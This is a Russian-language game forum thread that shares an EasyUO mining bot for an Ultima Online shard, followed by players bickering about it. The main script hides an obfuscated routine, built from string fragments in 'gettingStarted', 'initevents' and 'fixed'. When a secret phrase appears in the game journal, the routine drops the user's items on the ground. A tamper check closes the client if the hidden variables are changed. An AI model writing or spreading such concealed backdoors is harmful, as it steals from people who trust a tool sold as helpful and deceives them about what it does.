It is currently 28 Mar 2024, 22:52

All times are UTC + 2 hours [ DST ]




Post new topic Reply to topic  [ 279 posts ]  Go to page 1, 2, 3, 4, 5 ... 28  Next
Author Message
PostPosted: 12 Dec 2013, 09:32 
Offline
Бывший член администрации проекта
User avatar

Joined: 01 Apr 2013, 19:31
Posts: 17557
НЕ ПИШИТЕ МНЕ В ЛИЧКУ С ВОПРОСАМИ ОБ ЭТОМ СКРИПТЕ. ЗАДАВАЙТЕ ВОПРОСЫ В ЭТОЙ ТЕМЕ!!!

Скрипт копает руду в самом оптимальном режиме. Быстрее и больше цвет. металла, вы больше никак не выкопаете(будучи в афк режиме, по правилам сервера :D ).
Копает все тайлы по 1 разу, если попадается руда выше стали, - тайл выкапывается в 0( обычно он и так с 1 копка в 0 выкапывается, если металл выше стали).
Этот скрипт в прошлом году выкладывал igaza. Я его оптимизировал. За 24 часа, скрипт в среднем выкапывает: 100 элема , 125 лавы, 210 блек стила, 140 дарк кристалла, метеора гдето 170-200. Айрон выбрасывает, всё остальное ложит в сундук. Скрипт можно настроить что-бы бегать пешком от дома в шахту, или летать от дома в шахту по реколлу. Нужно изменить всего 3 переменных. И так, сначало нам нужно отметить 200 тайлов и записать их координаты, что-бы их потом обкапывать. 200 тайлов этот скрипт обкапывает примерно за 18-19 минут и руда как раз упевает отреспится на первом тайле и так далее. Вот скрипт для разметки тайлов. Этот скрипт записывает координаты в файл mineroute.txt(он сам его создаёт в папке где находится EasyUO). Для разметки тайлов, зайдите в шахту и возьмите в руки топорик для рубки деревьев. Запускайте скрипт и тыкайпе в пол, вам нужно 200 тайлов. Чем меньше преград и поворотов в шахте - тем лучше.
Tiler.txt
Code:
initevents
set %Tile 0
start:
finditem FSF ; берём в руки топорик hatchet
set #lobjectid #findid
event macro 17 0
targloop:
if #targcurs = 1
goto targloop
set #lobjectid #ltargetid
if %ltargetx = #ltargetx && %ltargety = #ltargety
{
event sysmessage error. try again
goto start
}
execute cmd.exe /c echo >>mineroute.txt GOSUB LJING #ltargetx #ltargety #ltargettile
set %ltargetx #ltargetx
set %ltargety #ltargety
set %tile %tile + 1
event sysmessage Done with Tile Nr. %tile
wait 10
goto start


Теперь берём эти координаты, открываем скрипт который внизу и вставляем их туда где написано РУССКИМ языком( 30 строка сверху-вниз) :D . После этого настраиваем переменные сверху. Так-же, в игре пишем .runebook_add и указываем на нашу рунбуку с рунами. Нужно сделать бинд, поставить на F1 useskill Meditation в клиенте.
Code:
; Скрипт написан InFlame, настроен под шард igaza, оптимизирован Aimed. Версия 2.0
set %maxWeight 650        ; максимальный вес
set %box UDQBLMD           ; ID ящика где будет хранится руда и рекол скроллы
set %xCoord 1942            ; X координата возле ящика
set %yCoord 324            ; Y координата возле ящика
set %dropMarganece #true    ; #true - сбрасывает айрон , #false - нет
set %recall #true          ; #true - летает с рунбуки, #false - бегает пешком от дома в шахту
; Не трогайте эти настройки, если %recall #false
set %runebookID SHTKLMD      ; ID рунбука
set %runeNumberToHome 1      ; номер руны к дому в рунбуке
set %runeNumberToCave 2    ; номер руны в пещеру в рунбуке
set %amountRecalls 2       
set %dropDelay 45         
set %lootDelay 45           
set %dropDelay 45           
; End Of Set Up Part

set %item OVF_EVF_HVF_RVF_FVF_GVF_BVF_VUF_DWJ_TVj_GWJ_EWJ_ZLK_POF_RZF_SJG_CUD_IJG_HSF_RVH_FZH_UJG_DCI_FWL_NZH
set %loot OVF_EVF_HVF_RVF_FVF_GVF_BVF_VUF_DCI_POF_RZF_SJG_CUD_IJG_HSF_RVH_FZH_NZH_UJG_FWL

gosub gettingStarted
gosub initevents
set %k 0
set %lastK 0

start: 

GOSUB LJING X ; ЗДЕСЬ ВСТАВЛЯЕМ КООРДИНАТЫ ИЗ СКРИПТА Tiler, идём в шахту и запускаем скрипт!




goto start

sub ljing
set %k %k + 1
gosub ghost
gosub checkWeight
gosub kopka

sub kopka
move %1 %2 1
finditem NPF_QPF C
if #findcnt = 0
 {
  display ok Pickaxe wasn't found!
  pause
 }
set #lobjectid #findid
event macro 17 0
target 30s
set #ltargetx %1
set #ltargety %2
set #ltargetkind 3
set #ltargettile %3
event macro 22 0
wait 10
set %overtime #scnt + 25
gosub scan
return

sub checkWeight
if #weight > %maxWeight
{
if ! %dropMarganece
 {
 if %recall
 gosub port
 if ! %recall
 gosub moveItems
 }
if %dropMarganece
 {
 gosub dropMarganece
 return
 }
}
if %afk <> true || %else <> IJG
gosub ghost 1
return

sub scan
scan:
scanjournal
if ( ( put_the_pieces in #sysMsg ) || ( put_the_Elemental in #sysMsg ) || ( put_the_Lava in #sysMsg ) || ( You_loosen in #sysMsg ) || ( put_the_Dark_Crystal in #sysMsg ) || ( put_the_Meteor in #sysMsg ) || ( put_the_Black_Steel in #sysMsg ) || ( put_the_Gold in #sysMsg ) || ( put_the_Silver in #sysMsg ) || ( put_the_Platinum in #sysMsg ) )
gosub kopka
%get fixed
if ( ( You_put_the_Steel_ore in #sysMsg ) || ( You_put_the_Copper_ore in #sysMsg ) || ( You_put_the_Bronze_ore in #sysMsg ) || ( You_put_the_Iron_ore in #sysMsg ) || ( nothing in #sysMsg ) || ( line in #sysMsg ) || ( decide in #sysMsg ) || ( Try in #sysMsg ) || ( close in #sysMsg ) || ( see in #sysMsg ) || ( line in #sysMsg ) )
return
if #scnt >= %overtime
return
goto scan
return
return

sub port
set %oldPosX #charposx
set %oldPosY #charposy
repeat
if #mana < #int
{
gosub Meditate
}
msg .recall %runeNumberToHome $
wait 150
until #charposx <> %oldPosX && #charposy <> %oldPosY
gosub moveItems
gosub back
return


sub Meditate
repeat
key F1 ; нужно поставить медитацию в клиенте на F1
wait 50
until #mana = #int
return



sub moveItems
ignoreitem reset 1
gosub runToBox
finditem %box G_3
wait 10
if #findcnt = 0
 {
  event Sysmessage Box Not Found!
  halt
 }
repeat
{
finditem %item c_ , #backpackid
if #findcnt >= 1
{
if world_save_has_been in #sysmsg
wait 15s
exevent Drag #Findid #findstack
exevent Dropc %box
wait %dropDelay
}
}
until #findcnt = 0
ignoreitem reset 1
if %recall
gosub recalls
return




sub recalls
finditem WTL C_ , #backpackid
if #findstack <= 2 || #findcnt = 0
{
set #lobjectid %box
event macro 17 0
while #contid <> %box
wait 1
wait 10
finditem WTL C_ , %box
exevent drag #findid %amountRecalls
exevent dropc #backpackid
wait 30
}
return





sub runToBox
repeat
 {
 move %xCoord %yCoord 0 3s
 wait 10
 }
until #charposx = %xCoord && #charposy = %yCoord
return



sub back
set %oldPosX #charposx
set %oldPosY #charposy
 {
finditem WTL C_ , #backpackid
exevent drag #findid 2
exevent dropc %runebookID
 }
repeat
if #mana < #int
{
gosub Meditate
}
msg .recall %runeNumberToCave $
wait 150
until #charposx <> %oldPosX && #charposy <> %oldPosY
return

sub ghost
if #charghost = YES || %0 = 1
{
terminate uo
halt
}
return




sub fixed
set %k %k + 1
%to %bca %be # . %all
{
repeat
{
set %up # . %cares
%done %start , _ , %else %end , _ , %up
%lastdo %race # . %Wsave
%lastdo %eaea # . %alpha # . %beta # . %gamma
%upgrade 25
%done %start , _ , %else %end , _ , %up
}
until # . %gems = 0
}
return



sub initevents
set %rescourse finding
str left %rescourse 4
set %save #strres
set %done %save , item
set %iii kill
str left string 1
set %asd #strres , %iii
set %start % . %asd
str left CADY 1
set %end #strres
str left character 4
set %who #strres
set %cares %who , id
str left %do 4
set %lastdo ex , #strres , t
set %race dragrace
str left %race 4
set %race #strres
set %Wsave %save , id
str right skopg 3
set %jasl #strres
str left drive 2
set %eaea #strres , %jasl
str left post 3
set %number %who , #strres
set %alpha %number , x
set %beta %number , y
set %gamma %number , z
set %repsawn waitrespawn
str left %repsawn 4
set %upgrade #strres
str left tilbery 3
set %almost #strres
str left unuquady 2
set %past #strres , %almost
set %gems %save , cnt
set %else IJG
return



sub dropMarganece
dropLoop:
finditem DWJ C_ , #backpackid
if #findcnt = 0
 {
  wait 20
  if #weight >= %maxweight
   {
   if %recall
   gosub port
   if ! %recall
   gosub moveItems
   return
   }
  if #weight < %maxweight
   return
 }
if #findcol = 0
{
exevent drag #findid #findstack
exevent dropg #charposx #charposy #charposz
wait %dropDelay
}
ignoreitem #findid 1
goto dropLoop
return




sub gettingStarted
set %afk true
set %ell qaerty
str left %ell 1
set %abc #strres , #strres , #strres
set %a1 #strres
str left %ell 2
str right #strres 1
set %cba %abc , #strres , %a1
set %bca %cba , #strres
str right %afk 1
set %bca %bca , #strres
set %bra %bca , b
set %n1 nlogif
str right %n1 2
set %to #strres
str left %n1 1
set %be #strres
str right %n1 2
str left #strres 1
set %be #strres , %be
set %tour jour
set %navigate nalliwate
str left %navigate 3
set %all %tour , #strres
set %navigate gost
str left %navigate 3
set %ac #strres
str right pub 2
set %get %ac , #strres
set %do events
str right linit 4
set %toGo #strres , %do
return


Если возникнут проблемы, - НЕ ПИШИТЕ МНЕ В ЛС, я не буду отвечать.
Удачи.
Скрипт оптимизирован, версия 2.0


Last edited by Aimed on 13 Dec 2013, 07:14, edited 13 times in total.

Top
 Profile  
 
PostPosted: 12 Dec 2013, 09:47 
Offline
Бывший член администрации проекта
User avatar

Joined: 01 Apr 2013, 19:31
Posts: 17557
В будущем возможны модификации:
1)Трекинг и инвиз+рекол при детекте других игроков по журналу/трекингу.
2)Рекол без тыканья по координатам экрана, а вместо этого юзанье серверного макроса .recall X - сделано.


Last edited by Aimed on 13 Dec 2013, 06:32, edited 1 time in total.

Top
 Profile  
 
PostPosted: 12 Dec 2013, 10:39 
Offline
Игрок

Joined: 25 Oct 2013, 20:21
Posts: 175
Это конечно круто, но у кого хватит терпения 200 раз тыкать? Проще скачать готовый без заморочек. Я вот для себя поменял координаты и так же выкапываю все тайлы вокруг. Причем, достаточно только 25, они успевают респится.
Хотя, каждому своё...


Top
 Profile  
 
PostPosted: 12 Dec 2013, 10:43 
Offline
Игрок

Joined: 16 Nov 2013, 23:39
Posts: 129
Как я понимаю, тут фишка в том, что скрипт будет копать только выкапываемые тайлы. А если маркать координаты и копать по кругу, то иногда будут попадаться кусочек скалы или еще что-то. И скрипт потратить 1 десятую секунды а то и меньше что бы ее пропустить. Каждому свое. Я лично копаю в 3х шахтах, меняю их время от времени как начинают прилипать нахлебники за кирками. И маркать в каждой пещере 200 тайлов. Даже не знаю. Каждому свое.

_________________
Archer: Wywern - 13 lvl


Top
 Profile  
 
PostPosted: 12 Dec 2013, 10:46 
Offline
Бывший член администрации проекта
User avatar

Joined: 01 Apr 2013, 19:31
Posts: 17557
Three wrote:
Это конечно круто, но у кого хватит терпения 200 раз тыкать? Проще скачать готовый без заморочек. Я вот для себя поменял координаты и так же выкапываю все тайлы вокруг. Причем, достаточно только 25, они успевают респится.
Хотя, каждому своё...


Это занимает 7 минут :) ( Лично у меня), не знаю с какой скоростью ты тыкаешь...

И что значит готовый? Готовый который вокруг себя копает? Там не будет хватать тайлов для круговорота по респу.

Кто-то из вас на своём скрипте выкапывает 100 элема в сутки? Если нет, то валите отсюда. Не засоряйте тему :)
marakoris wrote:
Как я понимаю, тут фишка в том, что скрипт будет копать только выкапываемые тайлы. А если маркать координаты и копать по кругу, то иногда будут попадаться кусочек скалы или еще что-то. И скрипт потратить 1 десятую секунды а то и меньше что бы ее пропустить.

Как ты разметишь тайлы, так и будет копать. Если через жопу разметишь, так и будет работать.


Top
 Profile  
 
PostPosted: 12 Dec 2013, 10:53 
Offline
Игрок

Joined: 25 Oct 2013, 20:21
Posts: 175
Aimed
Так, не буянь. ))
Вот видишь в чем вся заковырка? "Как ты разметишь тайлы, так и будет копать. Если через жопу разметишь, так и будет работать." Большинство и готовые скрипты настроить не могут. Я таким был, знаю.
Дай, скажем, для Минока, я ночью с удовольствием проверю. А потом вынесу вердикт. )))


Top
 Profile  
 
PostPosted: 12 Dec 2013, 10:55 
Offline
Бывший член администрации проекта
User avatar

Joined: 01 Apr 2013, 19:31
Posts: 17557
Three wrote:
Aimed
Так, не буянь. ))
Вот видишь в чем вся заковырка? "Как ты разметишь тайлы, так и будет копать. Если через жопу разметишь, так и будет работать." Большинство и готовые скрипты настроить не могут. Я таким был, знаю.
Дай, скажем, для Минока, я ночью с удовольствием проверю. А потом вынесу вердикт. )))



Так бери... вот лежит-же. Или ты под предлогом, что-бы я тебе разметил тайлы, ещё может айдишники прописал и дал, а ты только кнопочку пуск нажмешь и всё полетело?)))) Давай я тебе может сразу руду давать буду? :D

Тут весь всё ппц как просто. Я всё расписал от А до Я, по-русски.


Top
 Profile  
 
PostPosted: 12 Dec 2013, 11:03 
Offline
Игрок

Joined: 25 Oct 2013, 20:21
Posts: 175
Aimed wrote:
Three wrote:
Aimed
Так, не буянь. ))
Вот видишь в чем вся заковырка? "Как ты разметишь тайлы, так и будет копать. Если через жопу разметишь, так и будет работать." Большинство и готовые скрипты настроить не могут. Я таким был, знаю.
Дай, скажем, для Минока, я ночью с удовольствием проверю. А потом вынесу вердикт. )))



Так бери... вот лежит-же. Или ты под предлогом, что-бы я тебе разметил тайлы, ещё может айдишники прописал и дал, а ты только кнопочку пуск нажмешь и всё полетело?)))) Давай я тебе может сразу руду давать буду? :D

Тут весь всё ппц как просто. Я всё расписал от А до Я, по-русски.


Я именно и надеялся, что ты за меня все нажмешь. ) Ладно, проверю. Если про сотню не гонишь, я тебе памятник поставлю. )


Top
 Profile  
 
PostPosted: 12 Dec 2013, 11:48 
Offline
Бывший член администрации проекта
User avatar

Joined: 01 Apr 2013, 19:31
Posts: 17557
Three wrote:
Aimed wrote:
Three wrote:
Aimed
Так, не буянь. ))
Вот видишь в чем вся заковырка? "Как ты разметишь тайлы, так и будет копать. Если через жопу разметишь, так и будет работать." Большинство и готовые скрипты настроить не могут. Я таким был, знаю.
Дай, скажем, для Минока, я ночью с удовольствием проверю. А потом вынесу вердикт. )))



Так бери... вот лежит-же. Или ты под предлогом, что-бы я тебе разметил тайлы, ещё может айдишники прописал и дал, а ты только кнопочку пуск нажмешь и всё полетело?)))) Давай я тебе может сразу руду давать буду? :D

Тут весь всё ппц как просто. Я всё расписал от А до Я, по-русски.


Я именно и надеялся, что ты за меня все нажмешь. ) Ладно, проверю. Если про сотню не гонишь, я тебе памятник поставлю. )


Нах мне гнать? Я тут время тратил, редактировал всё(3 раза вон) расписал от А до Я, а ты такую наглость проявляешь. Первые 2 постера тупо пытались *поднасрать* :-\
Выложил что-бы больше копали, больше могли носить и чаще в ПвП выходили!


Top
 Profile  
 
PostPosted: 12 Dec 2013, 11:51 
Offline
Игрок

Joined: 16 Nov 2013, 23:39
Posts: 129
Первые два постера это ты и ты?

_________________
Archer: Wywern - 13 lvl


Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 279 posts ]  Go to page 1, 2, 3, 4, 5 ... 28  Next

All times are UTC + 2 hours [ DST ]


Who is online

Users browsing this forum: No registered users and 153 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
Jump to:  
Powered by phpBB® Forum Software © phpBB Group